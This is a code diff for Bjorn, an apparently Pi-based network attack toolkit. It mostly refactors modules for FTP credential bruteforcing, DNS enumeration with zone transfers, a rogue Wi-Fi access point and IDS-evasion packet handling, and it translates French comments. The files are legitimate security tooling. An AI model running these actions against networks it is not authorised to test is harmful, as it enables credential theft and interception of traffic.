row: Dict with MAC Address, IPs, Ports, Alive
|
||||
status_key: Action class name (for status tracking)
|
||||
|
||||
Returns:
|
||||
'success' or 'failed'
|
||||
"""
|
||||
verbose = getattr(self.shared_data, "verbose", False)
|
||||
scan_count = int(getattr(self.shared_data, "scan_count", 3))
|
||||
mode = getattr(self.shared_data, "mode", "normal")
|
||||
|
||||
print(f"[*] Running ExampleBjornAction on {ip} (mode={mode}, count={scan_count})")
|
||||
|
||||
# Example: query DB for known hosts
|
||||
try:
|
||||
host_count = self.shared_data.db.query_one(
|
||||
"SELECT COUNT(1) c FROM hosts"
|
||||
)
|
||||
print(f"[*] Known hosts in DB: {host_count['c'] if host_count else 0}")
|
||||
except Exception as e:
|
||||
print(f"[!] DB query failed: {e}")
|
||||
|
||||
# Simulate work
|
||||
for i in range(scan_count):
|
||||
if getattr(self.shared_data, "orchestrator_should_exit", False):
|
||||
print("[!] Stop requested, aborting")
|
||||
return "failed"
|
||||
print(f"[*] Probe {i+1}/{scan_count} on {ip}...")
|
||||
if verbose:
|
||||
print(f" MAC={row.get('MAC Address', 'unknown')} mode={mode}")
|
||||
time.sleep(1)
|
||||
|
||||
print(f"[+] Done. {scan_count} probes completed on {ip}")
|
||||
return "success"
|
||||
97
actions/custom/example_free_script.py
Normal file
97
actions/custom/example_free_script.py
Normal file
@@ -0,0 +1,97 @@
|
||||
"""example_free_script.py - Custom script template using plain Python (no shared_data)."""
|
||||
|
||||
import argparse
|
||||
import time
|
||||
import sys
|
||||
|
||||
# ---- Display metadata (optional, used by the web UI) ----
|
||||
b_name = "Example Free Script"
|
||||
b_description = "Standalone Python script demo with argparse and progress output."
|
||||
b_author = "Bjorn Community"
|
||||
b_version = "1.0.0"
|
||||
b_tags = '["custom", "example", "template", "free"]'
|
||||
|
||||
# ---- Argument schema (drives the web UI controls, same format as Bjorn actions) ----
|
||||
b_args = {
|
||||
"target": {
|
||||
"type": "text",
|
||||
"default": "192.168.1.0/24",
|
||||
"description": "Target host or CIDR range"
|
||||
},
|
||||
"timeout": {
|
||||
"type": "number",
|
||||
"default": 5,
|
||||
"min": 1,
|
||||
"max": 60,
|
||||
"description": "Timeout per probe in seconds"
|
||||
},
|
||||
"output_format": {
|
||||
"type": "select",
|
||||
"choices": ["text", "json", "csv"],
|
||||
"default": "text",
|
||||
"description": "Output format"
|
||||
},
|
||||
"dry_run": {
|
||||
"type": "checkbox",
|
||||
"default": False,
|
||||
"description": "Simulate without actually probing"
|
||||
}
|
||||
}
|
||||
|
||||
b_examples = [
|
||||
{"name": "Quick local check", "args": {"target": "192.168.1.1", "timeout": 2, "output_format": "text"}},
|
||||
{"name": "Dry run JSON", "args": {"target": "10.0.0.0/24", "timeout": 5, "output_format": "json", "dry_run": True}},
|
||||
]
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Example free-form Bjorn custom script")
|
||||
parser.add_argument("--target", default="192.168.1.0/24", help="Target host or CIDR")
|
||||
parser.add_argument("--timeout", type=int, default=5, help="Timeout per probe (seconds)")
|
||||
parser.add_argument("--output-format", default="text", choices=["text", "json", "csv"])
|
||||
parser.add_argument("--dry-run", action="store_true", help="Simulate without probing")
|
||||
args = parser.parse_args()
|
||||
|
||||
print(f"[*] Example Free Script starting")
|
||||
print(f"[*] Target: {args.target}")
|
||||
print(f"[*] Timeout: {args.timeout}s")
|
||||
print(f"[*] Format: {args.output_format}")
|
||||
print(f"[*] Dry run: {args.dry_run}")
|
||||
print()
|
||||
|
||||
# Simulate some work with progress output
|
||||
steps = 5
|
||||
for i in range(steps):
|
||||
print(f"[*] Step {i+1}/{steps}: {'simulating' if args.dry_run else 'probing'} {args.target}...")
|
||||
time.sleep(1)
|
||||
|
||||
# Example output in different formats
|
||||
results = [
|
||||
{"host": "192.168.1.1", "status": "up", "latency": "2ms"},
|
||||
{"host": "192.168.1.100", "status": "up", "latency": "5ms"},
|
||||
]
|
||||
|
||||
if args.output_format == "json":
|
||||
import json
|
||||
print(json.dumps(results, indent=2))
|
||||
elif args.output_format == "csv":
|
||||
print("host,status,latency")
|
||||
for r in results:
|
||||
print(f"{r['host']},{r['status']},{r['latency']}")
|
||||
else:
|
||||
for r in results:
|
||||
print(f" {r['host']} {r['status']} ({r['latency']})")
|
||||
|
||||
print()
|
||||
print(f"[+] Done. Found {len(results)} hosts.")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
main()
|
||||
except KeyboardInterrupt:
|
||||
print("\n[!] Interrupted")
|
||||
sys.exit(130)
|
||||
except Exception as e:
|
||||
print(f"\n[!] Error: {e}")
|
||||
sys.exit(1)
|
||||
@@ -1,9 +1,5 @@
|
||||
# demo_action.py
|
||||
# Demonstration Action: wrapped in a DemoAction class
|
||||
"""demo_action.py - Minimal template action that prints its arguments."""
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Metadata (compatible with sync_actions / Neo launcher)
|
||||
# ---------------------------------------------------------------------------
|
||||
b_class = "DemoAction"
|
||||
b_module = "demo_action"
|
||||
b_enabled = 1
|
||||
@@ -14,6 +10,19 @@ b_description = "Demonstration action: simply prints the received arguments."
|
||||
b_author = "Template"
|
||||
b_version = "0.1.0"
|
||||
b_icon = "demo_action.png"
|
||||
b_status = "demo_action"
|
||||
b_port = None
|
||||
b_service = "[]"
|
||||
b_trigger = None
|
||||
b_parent = None
|
||||
b_priority = 0
|
||||
b_cooldown = 0
|
||||
b_rate_limit = None
|
||||
b_timeout = 60
|
||||
b_max_retries = 0
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["demo", "template", "test"]
|
||||
|
||||
b_examples = [
|
||||
{
|
||||
@@ -129,6 +138,8 @@ def _list_net_ifaces() -> list[str]:
|
||||
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
|
||||
except Exception:
|
||||
pass
|
||||
if os.name == "nt":
|
||||
return ["Ethernet", "Wi-Fi"]
|
||||
try:
|
||||
for n in os.listdir("/sys/class/net"):
|
||||
if n and n != "lo":
|
||||
@@ -183,7 +194,8 @@ class DemoAction:
|
||||
def execute(self, ip=None, port=None, row=None, status_key=None):
|
||||
"""Called by the orchestrator. This demo only prints arguments."""
|
||||
self.shared_data.bjorn_orch_status = "DemoAction"
|
||||
self.shared_data.comment_params = {"ip": ip, "port": port}
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"status": "running"}
|
||||
|
||||
print("=== DemoAction :: executed ===")
|
||||
print(f" IP/Target: {ip}:{port}")
|
||||
|
||||
@@ -1,19 +1,4 @@
|
||||
"""
|
||||
dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
|
||||
|
||||
Performs comprehensive DNS intelligence gathering on discovered hosts:
|
||||
- Reverse DNS lookup on target IP
|
||||
- Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
|
||||
- Zone transfer (AXFR) attempts against discovered nameservers
|
||||
- Subdomain brute-force enumeration with threading
|
||||
|
||||
SQL mode:
|
||||
- Targets provided by the orchestrator (ip + port)
|
||||
- IP -> (MAC, hostname) mapping read from DB 'hosts'
|
||||
- Discovered hostnames are written back to DB hosts table
|
||||
- Results saved as JSON in data/output/dns/
|
||||
- Action status recorded in DB.action_results (via DNSPillager.execute)
|
||||
"""
|
||||
"""dns_pillager.py - DNS recon: reverse lookups, record enumeration, zone transfers, subdomain brute."""
|
||||
|
||||
import os
|
||||
import json
|
||||
@@ -29,7 +14,6 @@ from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
# Configure the logger
|
||||
logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -48,12 +48,12 @@ b_args = {
|
||||
"input_dir": {
|
||||
"type": "text",
|
||||
"label": "Input Data Dir",
|
||||
"default": "/home/bjorn/Bjorn/data/output"
|
||||
"default": "data/output"
|
||||
},
|
||||
"output_dir": {
|
||||
"type": "text",
|
||||
"label": "Reports Dir",
|
||||
"default": "/home/bjorn/Bjorn/data/reports"
|
||||
"default": "data/reports"
|
||||
},
|
||||
"watch": {
|
||||
"type": "checkbox",
|
||||
@@ -92,7 +92,8 @@ class FreyaHarvest:
|
||||
with self.lock:
|
||||
self.data[cat].append(finds)
|
||||
new_findings += 1
|
||||
except: pass
|
||||
except Exception:
|
||||
logger.debug(f"Failed to read {f_path}")
|
||||
|
||||
if new_findings > 0:
|
||||
logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")
|
||||
@@ -123,20 +124,30 @@ class FreyaHarvest:
|
||||
self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")
|
||||
|
||||
def execute(self, ip, port, row, status_key) -> str:
|
||||
input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
|
||||
output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
|
||||
# Reset per-run state to prevent memory accumulation
|
||||
self.data.clear()
|
||||
self.last_scan_time = 0
|
||||
|
||||
_data_dir = getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data")
|
||||
_default_input = os.path.join(_data_dir, "output")
|
||||
_default_output = os.path.join(_data_dir, "reports")
|
||||
input_dir = getattr(self.shared_data, "freya_harvest_input", _default_input)
|
||||
output_dir = getattr(self.shared_data, "freya_harvest_output", _default_output)
|
||||
watch = getattr(self.shared_data, "freya_harvest_watch", True)
|
||||
fmt = getattr(self.shared_data, "freya_harvest_format", "all")
|
||||
timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))
|
||||
|
||||
logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
|
||||
self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"input": os.path.basename(input_dir), "items": "0"}
|
||||
|
||||
start_time = time.time()
|
||||
try:
|
||||
while time.time() - start_time < timeout:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
logger.info("FreyaHarvest: Interrupted by orchestrator.")
|
||||
return "interrupted"
|
||||
|
||||
self._collect_data(input_dir)
|
||||
self._generate_report(output_dir, fmt)
|
||||
@@ -145,6 +156,9 @@ class FreyaHarvest:
|
||||
elapsed = int(time.time() - start_time)
|
||||
prog = int((elapsed / timeout) * 100)
|
||||
self.shared_data.bjorn_progress = f"{prog}%"
|
||||
# EPD live status update
|
||||
total_items = sum(len(v) for v in self.data.values())
|
||||
self.shared_data.comment_params = {"input": os.path.basename(input_dir), "items": str(total_items)}
|
||||
|
||||
if not watch:
|
||||
break
|
||||
@@ -156,6 +170,9 @@ class FreyaHarvest:
|
||||
except Exception as e:
|
||||
logger.error(f"FreyaHarvest error: {e}")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
|
||||
@@ -1,10 +1,4 @@
|
||||
"""
|
||||
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Succès -> DB.creds (service='ftp')
|
||||
- Conserve la logique d’origine (queue/threads, sleep éventuels, etc.)
|
||||
"""
|
||||
"""ftp_bruteforce.py - Threaded FTP credential bruteforcer, results stored in DB."""
|
||||
|
||||
import os
|
||||
import threading
|
||||
@@ -28,11 +22,24 @@ b_parent = None
|
||||
b_service = '["ftp"]'
|
||||
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "ftp", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "FTP Bruteforce"
|
||||
b_description = "Threaded FTP credential bruteforcer with share enumeration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "FTPBruteforce.png"
|
||||
|
||||
class FTPBruteforce:
|
||||
"""Wrapper orchestrateur -> FTPConnector."""
|
||||
"""Orchestrator wrapper for FTPConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -40,11 +47,11 @@ class FTPBruteforce:
|
||||
logger.info("FTPConnector initialized.")
|
||||
|
||||
def bruteforce_ftp(self, ip, port):
|
||||
"""Lance le bruteforce FTP pour (ip, port)."""
|
||||
"""Run FTP bruteforce for (ip, port)."""
|
||||
return self.ftp_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
self.shared_data.bjorn_orch_status = "FTPBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
logger.info(f"Brute forcing FTP on {ip}:{port}...")
|
||||
@@ -53,12 +60,11 @@ class FTPBruteforce:
|
||||
|
||||
|
||||
class FTPConnector:
|
||||
"""Gère les tentatives FTP, persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
"""Handles FTP attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -71,7 +77,7 @@ class FTPConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -186,7 +192,7 @@ class FTPConnector:
|
||||
self.progress.advance(1)
|
||||
self.queue.task_done()
|
||||
|
||||
# Pause configurable entre chaque tentative FTP
|
||||
# Configurable delay between FTP attempts
|
||||
if getattr(self.shared_data, "timewait_ftp", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_ftp)
|
||||
|
||||
@@ -267,7 +273,8 @@ class FTPConnector:
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
pass
|
||||
"""No longer needed with unique DB index; kept for interface compat."""
|
||||
# Dedup handled by DB UNIQUE constraint + ON CONFLICT in save_results
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -119,6 +119,14 @@ class HeimdallGuard:
|
||||
return packet
|
||||
|
||||
def execute(self, ip, port, row, status_key) -> str:
|
||||
if not HAS_SCAPY:
|
||||
logger.error("HeimdallGuard requires scapy but it is not installed.")
|
||||
return "failed"
|
||||
|
||||
# Reset per-run state
|
||||
self.stats = {'packets_processed': 0, 'packets_fragmented': 0, 'timing_adjustments': 0}
|
||||
self.packet_queue.clear()
|
||||
|
||||
iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface)
|
||||
mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
|
||||
delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))
|
||||
@@ -126,6 +134,8 @@ class HeimdallGuard:
|
||||
|
||||
logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
|
||||
self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "mode": mode, "iface": iface}
|
||||
|
||||
self.active = True
|
||||
start_time = time.time()
|
||||
@@ -133,10 +143,8 @@ class HeimdallGuard:
|
||||
try:
|
||||
while time.time() - start_time < timeout:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
|
||||
# In a real scenario, this would be hooking into a packet stream
|
||||
# For this action, we simulate protection state
|
||||
logger.info("HeimdallGuard: Interrupted by orchestrator.")
|
||||
return "interrupted"
|
||||
|
||||
# Progress reporting
|
||||
elapsed = int(time.time() - start_time)
|
||||
@@ -158,6 +166,8 @@ class HeimdallGuard:
|
||||
return "failed"
|
||||
finally:
|
||||
self.active = False
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
|
||||
@@ -12,6 +12,7 @@ import subprocess
|
||||
import threading
|
||||
import time
|
||||
import re
|
||||
import tempfile
|
||||
import datetime
|
||||
|
||||
from typing import Any, Dict, List, Optional
|
||||
@@ -126,7 +127,7 @@ class LokiDeceiver:
|
||||
'rsn_pairwise=CCMP'
|
||||
])
|
||||
|
||||
h_path = '/tmp/bjorn_hostapd.conf'
|
||||
h_path = os.path.join(tempfile.gettempdir(), 'bjorn_hostapd.conf')
|
||||
with open(h_path, 'w') as f:
|
||||
f.write('\n'.join(h_conf))
|
||||
|
||||
@@ -140,7 +141,7 @@ class LokiDeceiver:
|
||||
'log-queries',
|
||||
'log-dhcp'
|
||||
]
|
||||
d_path = '/tmp/bjorn_dnsmasq.conf'
|
||||
d_path = os.path.join(tempfile.gettempdir(), 'bjorn_dnsmasq.conf')
|
||||
with open(d_path, 'w') as f:
|
||||
f.write('\n'.join(d_conf))
|
||||
|
||||
@@ -170,10 +171,16 @@ class LokiDeceiver:
|
||||
channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
|
||||
password = getattr(self.shared_data, "loki_deceiver_password", "")
|
||||
timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
|
||||
output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")
|
||||
_fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "wifi")
|
||||
output_dir = getattr(self.shared_data, "loki_deceiver_output", _fallback_dir)
|
||||
|
||||
# Reset per-run state
|
||||
self.active_clients.clear()
|
||||
|
||||
logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
|
||||
self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ssid": ssid, "iface": iface, "channel": str(channel)}
|
||||
|
||||
try:
|
||||
self.stop_event.clear()
|
||||
@@ -181,7 +188,8 @@ class LokiDeceiver:
|
||||
h_path, d_path = self._create_configs(iface, ssid, channel, password)
|
||||
|
||||
# Set IP for interface
|
||||
subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)
|
||||
subprocess.run(['sudo', 'ip', 'addr', 'add', '192.168.1.1/24', 'dev', iface], capture_output=True)
|
||||
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
|
||||
|
||||
# Start processes
|
||||
# Use DEVNULL to avoid blocking on unread PIPE buffers.
|
||||
@@ -208,7 +216,8 @@ class LokiDeceiver:
|
||||
start_time = time.time()
|
||||
while time.time() - start_time < timeout:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
logger.info("LokiDeceiver: Interrupted by orchestrator.")
|
||||
return "interrupted"
|
||||
|
||||
# Check if procs still alive
|
||||
if self.hostapd_proc.poll() is not None:
|
||||
@@ -219,6 +228,8 @@ class LokiDeceiver:
|
||||
elapsed = int(time.time() - start_time)
|
||||
prog = int((elapsed / timeout) * 100)
|
||||
self.shared_data.bjorn_progress = f"{prog}%"
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"ssid": ssid, "clients": str(len(self.active_clients)), "uptime": str(elapsed)}
|
||||
|
||||
if elapsed % 60 == 0:
|
||||
self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")
|
||||
@@ -244,10 +255,12 @@ class LokiDeceiver:
|
||||
for p in [self.hostapd_proc, self.dnsmasq_proc]:
|
||||
if p:
|
||||
try: p.terminate(); p.wait(timeout=5)
|
||||
except: pass
|
||||
except Exception: pass
|
||||
|
||||
# Restore NetworkManager if needed (custom logic based on usage)
|
||||
# subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
|
||||
@@ -1,16 +1,11 @@
|
||||
"""
|
||||
Vulnerability Scanner Action
|
||||
Scanne ultra-rapidement CPE (+ CVE via vulners si dispo),
|
||||
avec fallback "lourd" optionnel.
|
||||
Affiche une progression en % dans Bjorn.
|
||||
"""
|
||||
"""nmap_vuln_scanner.py - Nmap-based CPE/CVE vulnerability scanning with vulners integration."""
|
||||
|
||||
import re
|
||||
import time
|
||||
import nmap
|
||||
import json
|
||||
import logging
|
||||
from datetime import datetime, timedelta
|
||||
from datetime import datetime, timedelta, timezone
|
||||
from typing import Dict, List, Any
|
||||
|
||||
from shared import SharedData
|
||||
@@ -31,18 +26,28 @@ b_priority = 11
|
||||
b_cooldown = 0
|
||||
b_enabled = 1
|
||||
b_rate_limit = None
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["vuln", "nmap", "cpe", "cve", "scanner"]
|
||||
b_category = "recon"
|
||||
b_name = "Nmap Vuln Scanner"
|
||||
b_description = "Nmap-based CPE/CVE vulnerability scanning with vulners integration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "NmapVulnScanner.png"
|
||||
|
||||
# Regex compilé une seule fois (gain CPU sur Pi Zero)
|
||||
# Pre-compiled regex (saves CPU on Pi Zero)
|
||||
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)
|
||||
|
||||
|
||||
class NmapVulnScanner:
|
||||
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE) avec progression."""
|
||||
"""Nmap vulnerability scanner (fast CPE/CVE mode) with progress tracking."""
|
||||
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
# Pas de self.nm partagé : on instancie dans chaque méthode de scan
|
||||
# pour éviter les corruptions d'état entre batches.
|
||||
# No shared self.nm: instantiate per scan method to avoid state corruption between batches
|
||||
logger.info("NmapVulnScanner initialized")
|
||||
|
||||
# ---------------------------- Public API ---------------------------- #
|
||||
@@ -54,7 +59,7 @@ class NmapVulnScanner:
|
||||
self.shared_data.bjorn_progress = "0%"
|
||||
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
return 'failed'
|
||||
return 'interrupted'
|
||||
|
||||
# 1) Metadata
|
||||
meta = {}
|
||||
@@ -63,7 +68,7 @@ class NmapVulnScanner:
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 2) Récupérer MAC et TOUS les ports
|
||||
# 2) Get MAC and ALL ports
|
||||
mac = row.get("MAC Address") or row.get("mac_address") or ""
|
||||
|
||||
ports_str = ""
|
||||
@@ -87,13 +92,13 @@ class NmapVulnScanner:
|
||||
|
||||
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
|
||||
|
||||
# Nettoyage des ports (garder juste le numéro si format 80/tcp)
|
||||
# Strip port format (keep just the number from "80/tcp")
|
||||
ports = [p.split('/')[0] for p in ports]
|
||||
|
||||
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
|
||||
logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")
|
||||
|
||||
# 3) Filtrage "Rescan Only"
|
||||
# 3) "Rescan Only" filtering
|
||||
if self.shared_data.config.get('vuln_rescan_on_change_only', False):
|
||||
if self._has_been_scanned(mac):
|
||||
original_count = len(ports)
|
||||
@@ -105,24 +110,24 @@ class NmapVulnScanner:
|
||||
self.shared_data.bjorn_progress = "100%"
|
||||
return 'success'
|
||||
|
||||
# 4) SCAN AVEC PROGRESSION
|
||||
# 4) SCAN WITH PROGRESS
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
return 'failed'
|
||||
return 'interrupted'
|
||||
|
||||
logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
|
||||
findings = self.scan_vulnerabilities(ip, ports)
|
||||
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Scan interrupted by user")
|
||||
return 'failed'
|
||||
return 'interrupted'
|
||||
|
||||
# 5) Déduplication en mémoire avant persistance
|
||||
# 5) In-memory dedup before persistence
|
||||
findings = self._deduplicate_findings(findings)
|
||||
|
||||
# 6) Persistance
|
||||
self.save_vulnerabilities(mac, ip, findings)
|
||||
|
||||
# Finalisation UI
|
||||
# Final UI update
|
||||
self.shared_data.bjorn_progress = "100%"
|
||||
self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
|
||||
logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
|
||||
@@ -130,7 +135,7 @@ class NmapVulnScanner:
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
|
||||
self.shared_data.bjorn_progress = "Error"
|
||||
self.shared_data.bjorn_progress = "0%"
|
||||
return 'failed'
|
||||
|
||||
def _has_been_scanned(self, mac: str) -> bool:
|
||||
@@ -161,7 +166,7 @@ class NmapVulnScanner:
|
||||
|
||||
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
|
||||
if ttl > 0:
|
||||
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
|
||||
cutoff = datetime.now(timezone.utc) - timedelta(seconds=ttl)
|
||||
final_ports = []
|
||||
for p in ports:
|
||||
if p not in seen:
|
||||
@@ -180,7 +185,7 @@ class NmapVulnScanner:
|
||||
# ---------------------------- Helpers -------------------------------- #
|
||||
|
||||
def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
|
||||
"""Supprime les doublons (même port + vuln_id) pour éviter des inserts inutiles."""
|
||||
"""Remove duplicates (same port + vuln_id) to avoid redundant inserts."""
|
||||
seen: set = set()
|
||||
deduped = []
|
||||
for f in findings:
|
||||
@@ -201,7 +206,7 @@ class NmapVulnScanner:
|
||||
return [str(cpe).strip()]
|
||||
|
||||
def extract_cves(self, text: str) -> List[str]:
|
||||
"""Extrait les CVE via regex pré-compilé (pas de recompilation à chaque appel)."""
|
||||
"""Extract CVEs using pre-compiled regex."""
|
||||
if not text:
|
||||
return []
|
||||
return CVE_RE.findall(str(text))
|
||||
@@ -210,8 +215,7 @@ class NmapVulnScanner:
|
||||
|
||||
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
|
||||
"""
|
||||
Orchestre le scan en lots (batches) pour permettre la mise à jour
|
||||
de la barre de progression.
|
||||
Orchestrate scanning in batches for progress bar updates.
|
||||
"""
|
||||
all_findings = []
|
||||
|
||||
@@ -219,10 +223,10 @@ class NmapVulnScanner:
|
||||
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
|
||||
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
|
||||
|
||||
# Pause entre batches – important sur Pi Zero pour laisser respirer le CPU
|
||||
# Pause between batches -- important on Pi Zero to let the CPU breathe
|
||||
batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))
|
||||
|
||||
# Taille de lot réduite par défaut (2 sur Pi Zero, configurable)
|
||||
# Reduced batch size by default (2 on Pi Zero, configurable)
|
||||
batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))
|
||||
|
||||
target_ports = ports[:max_ports]
|
||||
@@ -240,7 +244,7 @@ class NmapVulnScanner:
|
||||
|
||||
port_str = ','.join(batch)
|
||||
|
||||
# Mise à jour UI avant le scan du lot
|
||||
# UI update before batch scan
|
||||
pct = int((processed_count / total) * 100)
|
||||
self.shared_data.bjorn_progress = f"{pct}%"
|
||||
self.shared_data.comment_params = {
|
||||
@@ -251,7 +255,7 @@ class NmapVulnScanner:
|
||||
|
||||
t0 = time.time()
|
||||
|
||||
# Scan du lot (instanciation locale pour éviter la corruption d'état)
|
||||
# Scan batch (local instance to avoid state corruption)
|
||||
if fast:
|
||||
batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
|
||||
else:
|
||||
@@ -263,11 +267,11 @@ class NmapVulnScanner:
|
||||
all_findings.extend(batch_findings)
|
||||
processed_count += len(batch)
|
||||
|
||||
# Mise à jour post-lot
|
||||
# Post-batch update
|
||||
pct = int((processed_count / total) * 100)
|
||||
self.shared_data.bjorn_progress = f"{pct}%"
|
||||
|
||||
# Pause CPU entre batches (vital sur Pi Zero)
|
||||
# CPU pause between batches (vital on Pi Zero)
|
||||
if batch_pause > 0 and processed_count < total:
|
||||
time.sleep(batch_pause)
|
||||
|
||||
@@ -275,10 +279,10 @@ class NmapVulnScanner:
|
||||
|
||||
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
|
||||
vulns: List[Dict] = []
|
||||
nm = nmap.PortScanner() # Instance locale – pas de partage d'état
|
||||
nm = nmap.PortScanner() # Local instance -- no shared state
|
||||
|
||||
# --version-light au lieu de --version-all : bien plus rapide sur Pi Zero
|
||||
# --min-rate/--max-rate : évite de saturer CPU et réseau
|
||||
# --version-light instead of --version-all: much faster on Pi Zero
|
||||
# --min-rate/--max-rate: avoid saturating CPU and network
|
||||
args = (
|
||||
"-sV --version-light -T4 "
|
||||
